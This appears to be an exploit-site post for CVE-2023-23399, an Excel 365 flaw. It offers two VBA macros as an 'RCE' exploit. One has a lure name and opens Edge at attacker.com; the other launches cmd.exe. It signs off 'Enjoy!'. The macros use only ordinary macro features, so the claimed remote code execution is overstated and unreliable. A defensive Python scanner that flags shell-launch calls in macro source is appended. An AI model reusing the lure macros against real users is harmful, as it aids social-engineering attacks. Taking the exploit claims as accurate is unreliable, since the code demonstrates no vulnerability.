
Remote Microsoft Excel 365 MSO (v 2302 Build 16.0.16130.20186) 64-bit RCE [Risk: 5/5]

blackhunt

## Date: 03.16.2023
## CVE ID: CVE-2023-23399
## Description:

The malicious user can exploit the victim's PC remotely.
For example, when the score indicates that the Attack Vector is Local
and User Interaction is Required, this could describe an exploit in
which an attacker, through social engineering, convinces a victim to
download and open a specially crafted file from a website which leads
to a local attack on their computer.


Code:
[+]Exploit0:
```
Sub Check_your_salaries()
    ' Hands a protocol-handler URI to the Windows shell, which opens it in Edge
    CreateObject("Shell.Application").ShellExecute "microsoft-edge:https://attacker.com"
End Sub
```
[+]Exploit1:
```
Sub cmd()
    Dim Program As String
    Dim TaskID As Double
    On Error Resume Next
    Program = "cmd.exe"
    ' Shell() starts the program; 1 = normal window with focus
    TaskID = Shell(Program, 1)
    If Err <> 0 Then
        MsgBox "Can't start " & Program
    End If
End Sub
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-23399)

## Proof and Exploit:
[href](https://streamable.com/dnyfx0)

## Time spent:
03:00:00


Enjoy!
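For triage of macro source already extracted from a workbook, the following added example (not part of the original post or the linked repository) flags the process-launch primitives the two macros above rely on: `Shell()`, `Shell.Application` with `ShellExecute`, and protocol-handler URI strings. The rule set, function names and sample text are assumptions constructed for illustration, and the rules are not exhaustive.

```python
import re

# Assumed rule set covering the launch primitives in the two macros above; not exhaustive.
RULES = [
    ("Shell() call", re.compile(r'(?<![\w.])Shell\s*\(', re.I)),
    ("Shell.Application COM object", re.compile(r'CreateObject\s*\(\s*"Shell\.Application"', re.I)),
    ("ShellExecute method", re.compile(r'\.ShellExecute\b', re.I)),
    ("URI/protocol handler string", re.compile(r'"[a-z][a-z0-9+.\-]+:[^\s"]', re.I)),
]
SUB_RE = re.compile(r'^\s*(?:(?:Public|Private)\s+)?(?:Sub|Function)\s+(\w+)', re.I)

def strip_comment(line):
    """Drop a trailing ' comment, ignoring apostrophes inside string literals."""
    in_string = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_string = not in_string
        elif ch == "'" and not in_string:
            return line[:i]
    return line

def scan_vba(source):
    """Return sorted (procedure, rule_name) findings for VBA source text."""
    source = re.sub(r'[ \t]_\r?\n', ' ', source)  # join " _" line continuations
    findings, current = set(), "<module>"
    for raw in source.splitlines():
        line = strip_comment(raw)
        m = SUB_RE.match(line)
        current = m.group(1) if m else current
        findings.update((current, name) for name, rx in RULES if rx.search(line))
    return sorted(findings)

# Constructed sample modelled on the macros in the post, plus a benign procedure.
SAMPLE = '''Sub Check_your_salaries()
    CreateObject("Shell.Application").ShellExecute _
        "microsoft-edge:https://attacker.com"
End Sub
Sub cmd()
    TaskID = Shell("cmd.exe", 1)
End Sub
Sub Totals()
    ' Shell("calc.exe") is only mentioned in this comment
    Range("A1").Value = "Total: 10"
End Sub
'''

if __name__ == "__main__":
    for proc, rule in scan_vba(SAMPLE):
        print(f"{proc}: {rule}")
```

A hit means the macro can start a process or hand a URI to the Windows shell; it is a reason to review the procedure, not proof of malice.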
 

